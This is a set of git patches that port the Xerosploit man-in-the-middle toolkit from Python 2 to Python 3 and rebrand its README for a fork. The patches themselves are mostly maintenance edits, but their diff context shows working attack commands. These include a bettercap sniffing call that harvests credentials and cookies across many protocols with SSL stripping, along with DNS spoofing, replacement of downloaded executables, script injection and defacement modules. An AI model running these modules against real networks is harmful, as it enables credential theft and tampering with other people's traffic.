From a90625f6ee5e3e0fa942c4566efee71f39a796d6 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Mon, 9 Aug 2021 15:27:06 +0000 Subject: [PATCH 01/15] Updated according to python3 The installer throws error because xerosploit have been old now I developed it to work with python3. Python2 has been old and in many distros don't have some python2 modules in their repositories so updated --- install.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/install.py b/install.py index 8e7dcfe..37074c4 100755 --- a/install.py +++ b/install.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/python3 # -*- coding: utf-8 -*- import os import sys @@ -42,7 +42,7 @@ def main(): 1) Ubuntu / Kali linux / Others 2) Parrot OS """) - system0 = raw_input(">>> ") + system0 = input(">>> ") if system0 == "1": print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m") install = os.system("apt-get update && apt-get install -y nmap hping3 build-essential python-pip ruby-dev git libpcap-dev libgmp3-dev && pip install tabulate terminaltables") @@ -54,7 +54,7 @@ def main(): bet_un = os.system("apt-get remove bettercap") # Remove bettercap to avoid some problems . Installed by default with apt-get . bet_re_ins = os.system("gem install bettercap") # Reinstall bettercap with gem. - install = os.system("apt-get update && apt-get install -y nmap hping3 ruby-dev git libpcap-dev libgmp3-dev python-tabulate python-terminaltables") + install = os.system("apt-get update && apt-get install -y nmap hping3 ruby-dev git libpcap-dev libgmp3-dev python3-tabulate python3-terminaltables") install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal." """) From d131aa6da0ddd1c58704c6017f4730f53904b7e5 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Mon, 9 Aug 2021 15:31:23 +0000 Subject: [PATCH 02/15] Updated according python3 This tool has been old like python2 now it will work like python3 and it can comeback again. I have to do that because many new distros' repositories don't have python2 modules like python-terminaltables but after change it can work with python3 --- xerosploit.py | 62 +++++++++++++++++++++++++-------------------------- 1 file changed, 31 insertions(+), 31 deletions(-) diff --git a/xerosploit.py b/xerosploit.py index b1a02c7..38f4477 100755 --- a/xerosploit.py +++ b/xerosploit.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/python3 # -*- coding: utf-8 -*- #---------------------------------------------------------------------------# @@ -135,7 +135,7 @@ def target_ip(): target_parse = " --target " # Bettercap target parse . This variable will be wiped if the user want to perform MITM ATTACK on all the network. print ("\033[1;32m\n[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.\n\033[1;m") - target_ips = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip() + target_ips = input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip() if target_ips == "back": home() @@ -157,7 +157,7 @@ def program0(): def option(): """ Choose a module """ print("\033[1;32m\n[+] Which module do you want to load ? Enter 'help' for more information.\n\033[1;m") - options = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc... + options = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc... # Port scanner if options == "pscan": print(""" \033[1;36m @@ -177,7 +177,7 @@ def pscan(): print("\033[1;32m\n[+] Enter 'run' to execute the 'pscan' command.\n\033[1;m") - action_pscan = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan + action_pscan = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan if action_pscan == "back": option() elif action_pscan == "exit": @@ -246,7 +246,7 @@ def dos(): print("\033[1;32m\n[+] Enter 'run' to execute the 'dos' command.\n\033[1;m") - action_dos = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip() + action_dos = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip() if action_dos == "back": option() @@ -284,7 +284,7 @@ def ping(): print("\033[1;32m\n[+] Enter 'run' to execute the 'ping' command.\n\033[1;m") - action_ping = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip() + action_ping = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip() if action_ping == "back": option() @@ -328,7 +328,7 @@ def ping(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def inject_html(): print("\033[1;32m\n[+] Enter 'run' to execute the 'injecthtml' command.\n\033[1;m") - action_inject = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip() + action_inject = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip() if action_inject == "back": option() elif action_inject == "exit": @@ -337,7 +337,7 @@ def inject_html(): home() elif action_inject == "run": print("\033[1;32m\n[+] Specify the file containing html code you would like to inject.\n\033[1;m") - html_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m") + html_file = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m") if html_file == "back": inject_html() @@ -369,7 +369,7 @@ def inject_html(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def rdownload(): print("\033[1;32m\n[+] Please type 'run' to execute the 'rdownload' command.\n\033[1;m") - action_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() + action_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() if action_rdownload == "back": option() elif action_rdownload == "exit": @@ -379,9 +379,9 @@ def rdownload(): elif action_rdownload == "run": module = "/opt/xerosploit/tools/bettercap/modules/http/replace_file.rb" print("\033[1;32m\n[+] Specify the extension of the files to replace. (e.g. exe)\n\033[1;m") - ext_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() + ext_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() print("\033[1;32m\n[+] Set the file to use in order to replace the ones matching the extension.\n\033[1;m") - file_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m") + file_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m") file_rdownload = file_rdownload.replace("'","") if file_rdownload == "back": rdownload() @@ -410,7 +410,7 @@ def rdownload(): def snif(): print("\033[1;32m\n[+] Please type 'run' to execute the 'sniff' command.\n\033[1;m") - action_snif = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() + action_snif = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() if action_snif == "back": option() elif action_snif == "exit": @@ -421,7 +421,7 @@ def snif(): def snif_sslstrip(): print("\033[1;32m\n[+] Do you want to load sslstrip ? (y/n).\n\033[1;m") - action_snif_sslstrip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() + action_snif_sslstrip = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() if action_snif_sslstrip == "y": print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m") print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m") @@ -436,7 +436,7 @@ def snif_sslstrip(): cmd_snif = os.system("xettercap --proxy " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap") def snifflog(): print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m") - action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() + action_log = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() if action_log == "n": cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*") print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m") @@ -473,7 +473,7 @@ def snifflog(): def snifflog(): print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m") - action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() + action_log = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip() if action_log == "n": cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*") print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m") @@ -522,7 +522,7 @@ def snifflog(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def dspoof(): print("\033[1;32m\n[+] Enter 'run' to execute the 'dspoof' command.\n\033[1;m") - action_dspoof = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip() + action_dspoof = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip() if action_dspoof == "back": option() elif action_dspoof == "exit": @@ -531,7 +531,7 @@ def dspoof(): home() elif action_dspoof == "run": print("\033[1;32m\n[+] Enter the IP address where you want to redirect the traffic.\n\033[1;m") - action_dspoof_ip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip() + action_dspoof_ip = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip() dns_conf = action_dspoof_ip + " .*\.*" outdns = open('/opt/xerosploit/tools/files/dns.conf','w') outdns.write(dns_conf) @@ -556,7 +556,7 @@ def dspoof(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def yplay(): print("\033[1;32m\n[+] Enter 'run' to execute the 'yplay' command.\n\033[1;m") - action_yplay = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip() + action_yplay = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip() if action_yplay == "back": option() elif action_yplay == "exit": @@ -565,7 +565,7 @@ def yplay(): home() elif action_yplay == "run": print("\033[1;32m\n[+] Insert a youtube video ID. (e.g. NvhZu5M41Z8)\n\033[1;m") - video_id = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip() + video_id = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip() if video_id == "back": option() elif video_id == "": # if raw = null @@ -600,7 +600,7 @@ def yplay(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def replace(): print("\033[1;32m\n[+] Enter 'run' to execute the 'replace' command.\n\033[1;m") - action_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip() + action_replace = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip() if action_replace == "back": option() elif action_replace == "exit": @@ -609,7 +609,7 @@ def replace(): home() elif action_replace == "run": print("\033[1;32m\n[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)\n\033[1;m") - img_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m") + img_replace = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m") img_replace = img_replace.replace("'","") if img_replace == "back": replace() @@ -645,7 +645,7 @@ def replace(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def driftnet(): print("\033[1;32m\n[+] Enter 'run' to execute the 'driftnet' command.\n\033[1;m") - action_driftnet = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip() + action_driftnet = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip() if action_driftnet == "back": option() elif action_driftnet == "exit": @@ -675,7 +675,7 @@ def driftnet(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def shakescreen(): print("\033[1;32m\n[+] Enter 'run' to execute the 'move' command.\n\033[1;m") - action_shakescreen = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip() + action_shakescreen = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip() if action_shakescreen == "back": option() elif action_shakescreen == "exit": @@ -703,7 +703,7 @@ def shakescreen(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def inject_j(): print("\033[1;32m\n[+] Enter 'run' to execute the 'injectjs' command.\n\033[1;m") - action_inject_j = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip() + action_inject_j = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip() if action_inject_j == "back": option() elif action_inject_j == "exit": @@ -712,7 +712,7 @@ def inject_j(): home() elif action_inject_j == "run": print("\033[1;32m\n[+] Specify the file containing js code you would like to inject.\n\033[1;m") - js_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m") + js_file = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m") js_file = js_file.replace("'","") if js_file == "back": inject_j() @@ -742,7 +742,7 @@ def inject_j(): └══════════════════════════════════════════════════════════════┘ \033[1;m""") def deface(): print("\033[1;32m\n[+] Enter 'run' to execute the 'deface' command.\n\033[1;m") - action_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip() + action_deface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip() if action_deface == "back": option() elif action_deface == "exit": @@ -753,7 +753,7 @@ def deface(): print("\033[1;32m\n[+] Specify the file containing your defacement code .\033[1;m") print("\033[1;33m\n[!] Your file should not contain Javascript code .\n\033[1;m") - file_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m") + file_deface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m") if file_deface == "back": option() @@ -863,7 +863,7 @@ def deface(): def cmd0(): while True: print("\033[1;32m\n[+] Please type 'help' to view commands.\n\033[1;m") - cmd_0 = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip() + cmd_0 = input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip() if cmd_0 == "scan": # Map the network print("\033[1;34m\n[++] Mapping your network ... \n\033[1;m") scan() @@ -879,7 +879,7 @@ def gateway(): print(table.table) print("\033[1;32m\n[+] Enter your network gateway.\n\033[1;m") - n_gateway = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip() + n_gateway = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip() if n_gateway == "back": home() @@ -906,7 +906,7 @@ def iface(): print(table.table) print("\033[1;32m\n[+] Enter your network interface.\n\033[1;m") - n_up_interface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip() + n_up_interface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip() if n_up_interface == "back": home() @@ -930,7 +930,7 @@ def iface(): elif cmd_0 == "rmlog": # Remove all logs def rm_log(): print("\033[1;32m\n[+] Do want to remove all xerosploit logs ? (y/n)\n\033[1;m") - cmd_rmlog = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip() + cmd_rmlog = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip() if cmd_rmlog == "y": rmlog = os.system("rm -f -R /opt/xerosploit/xerosniff/ /opt/xerosploit/tools/log/* /opt/xerosploit/tools/bettercap/modules/tmp/* /opt/xerosploit/tools/files/dns.conf") print("\033[1;31m\n[++] All logs have been removed. \n\033[1;m") From 6e5d38c2462a24f3b101ab4f417063f34c24b108 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Mon, 9 Aug 2021 15:43:31 +0000 Subject: [PATCH 03/15] Cool :star: Manual --- README.md | 34 ++++++---------------------------- 1 file changed, 6 insertions(+), 28 deletions(-) diff --git a/README.md b/README.md index 7d82a16..2c38d9f 100644 --- a/README.md +++ b/README.md @@ -1,15 +1,9 @@ - -[![Version](https://img.shields.io/badge/Xerosploit-Version_1.0-brightgreen.svg?maxAge=259200)]() -[![PyPI](https://img.shields.io/badge/Python-2.7-blue.svg)]() +[![PyPI](https://img.shields.io/badge/Python-3-blue.svg)]() [![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]() -[![AUR](https://img.shields.io/aur/license/yaourt.svg)]() Xerosploit = Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. -Powered by bettercap and nmap. - -![](http://i.imgur.com/bbr48Ep.png) Dependencies = @@ -30,8 +24,8 @@ Instalation = Dependencies will be automatically installed. - git clone https://github.com/LionSec/xerosploit - cd xerosploit && sudo python install.py + git clone https://github.com/hackerW1/xerosploit + cd xerosploit && sudo python3 install.py sudo xerosploit @@ -74,25 +68,9 @@ features - Drifnet - Webpage defacement and more ... -Demonstration -= -https://www.youtube.com/watch?v=35QUrtZEV9U - -I have some questions! -= - -Please visit https://github.com/LionSec/xerosploit/issues - -Donations -= -- Paypal : https://www.paypal.me/lionsec -- Bitcoin : 12dM5kZjYMizNuXaqu7QZBLNDkXjfKYpRD +## UPDATES -Contact +All Errors Fixed = -- Website : https://neodrix.com -- Youtube : https://youtube.com/inf98es -- Facebook : https://facebook.com/in98 -- Twitter: @LionSec1 -- Email : informatic98es@gmail.com +- LionSec's xerosploit has been old so this one can help those who are getting errors From d1acb2d734c433b59970351209455d1a6bca7925 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Mon, 9 Aug 2021 15:45:57 +0000 Subject: [PATCH 04/15] Cool :star: Manual --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2c38d9f..c2bdda8 100644 --- a/README.md +++ b/README.md @@ -47,7 +47,7 @@ Tested on Parrot OS - 3.1 + 4.11.2 From bf8532f5f5840843edaf26e44d725c599599748f Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 05:48:52 +0000 Subject: [PATCH 05/15] :white_check_mark: Error Free Installer --- install.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/install.py b/install.py index 37074c4..6149092 100755 --- a/install.py +++ b/install.py @@ -45,7 +45,7 @@ def main(): system0 = input(">>> ") if system0 == "1": print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m") - install = os.system("apt-get update && apt-get install -y nmap hping3 build-essential python-pip ruby-dev git libpcap-dev libgmp3-dev && pip install tabulate terminaltables") + install = os.system("apt-get update && apt-get install -y nmap hping3 build-essential python3-pip ruby-dev git libpcap-dev libgmp3-dev && pip3 install tabulate terminaltables") install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal." """) elif system0 == "2": From de577ae8d9c5924270aabb83190583c131d02878 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 05:53:30 +0000 Subject: [PATCH 06/15] :white_check_mark: Error Free --- xerosploit.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xerosploit.py b/xerosploit.py index 38f4477..12440df 100755 --- a/xerosploit.py +++ b/xerosploit.py @@ -70,7 +70,7 @@ def home(): print (xe_header()) print (""" -[+]═══════════[ Author : @LionSec1 \033[1;36m_-\|/-_\033[1;m Website: www.neodrix.com ]═══════════[+] +[+]═══════════[ Author : @hackerW1 \033[1;36m_-\|/-_\033[1;m YouTube: TechOtaku ]═══════════[+] [ Powered by Bettercap and Nmap ]""") From af0eb9421ba70628ded16c8aca776c737ff63ce5 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:21:13 +0000 Subject: [PATCH 07/15] Cool :sparcles: Manual --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c2bdda8..8255460 100644 --- a/README.md +++ b/README.md @@ -24,8 +24,8 @@ Instalation = Dependencies will be automatically installed. - git clone https://github.com/hackerW1/xerosploit - cd xerosploit && sudo python3 install.py + git clone https://github.com/hackerW1/xerosploit-python3 + cd xerosploit-python3 && sudo python3 install.py sudo xerosploit From 2ce62cbc1434db896ee43915ffeaa5763c44e894 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:22:08 +0000 Subject: [PATCH 08/15] Cool :sparcle: Manual --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8255460..cb39644 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ [![PyPI](https://img.shields.io/badge/Python-3-blue.svg)]() -[![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]() +[![Build](https://img.shields.io/badge/Supported_OS-linux-black.svg)]() Xerosploit = From e4fa6b0d049ea8336df92e66eb0867f160efe090 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:24:00 +0000 Subject: [PATCH 09/15] Cool :sparkles: Manual --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index cb39644..62ef30f 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -[![PyPI](https://img.shields.io/badge/Python-3-blue.svg)]() +[![PyPI](https://img.shields.io/badge/Language-Python3-blue.svg)]() [![Build](https://img.shields.io/badge/Supported_OS-linux-black.svg)]() Xerosploit From d6aa0945000bced52704bf9c3ed17f72968fb73d Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:33:22 +0000 Subject: [PATCH 10/15] :: --- run.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/run.sh b/run.sh index ed46789..432cf4e 100755 --- a/run.sh +++ b/run.sh @@ -21,6 +21,6 @@ # # #---------------------------------------------------------------------------# -python /opt/xerosploit/xerosploit.py +python3 /opt/xerosploit/xerosploit.py From 661568eea25ab00cd5dae2188912fd25d477e144 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:44:01 +0000 Subject: [PATCH 11/15] Cool :sparkles: README --- README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/README.md b/README.md index 62ef30f..958da50 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,15 @@ [![PyPI](https://img.shields.io/badge/Language-Python3-blue.svg)]() [![Build](https://img.shields.io/badge/Supported_OS-linux-black.svg)]() +__ _______ ____ ___ ____ ____ _ ___ ___ _____ +\ \/ / ____| _ \ / _ \/ ___|| _ \| | / _ \_ _|_ _| + \ /| _| | |_) | | | \___ \| |_) | | | | | | | | | + / \| |___| _ <| |_| |___) | __/| |__| |_| | | | | +/_/\_\_____|_| \_\\___/|____/|_| |_____\___/___| |_| + + + + Xerosploit = Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. From e2cf46daef28aaa076d7fbab33d50a2e50a5b1b8 Mon Sep 17 00:00:00 2001 From: hackerW1 <70388641+hackerW1@users.noreply.github.com> Date: Tue, 10 Aug 2021 11:53:57 +0000 Subject: [PATCH 12/15] Cool :sparkles: README --- README.md | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 958da50..4f652fd 100644 --- a/README.md +++ b/README.md @@ -1,14 +1,11 @@ +
+
+ +
[![PyPI](https://img.shields.io/badge/Language-Python3-blue.svg)]() [![Build](https://img.shields.io/badge/Supported_OS-linux-black.svg)]() - -__ _______ ____ ___ ____ ____ _ ___ ___ _____ -\ \/ / ____| _ \ / _ \/ ___|| _ \| | / _ \_ _|_ _| - \ /| _| | |_) | | | \___ \| |_) | | | | | | | | | - / \| |___| _ <| |_| |___) | __/| |__| |_| | | | | -/_/\_\_____|_| \_\\___/|____/|_| |_____\___/___| |_| - - - +
+
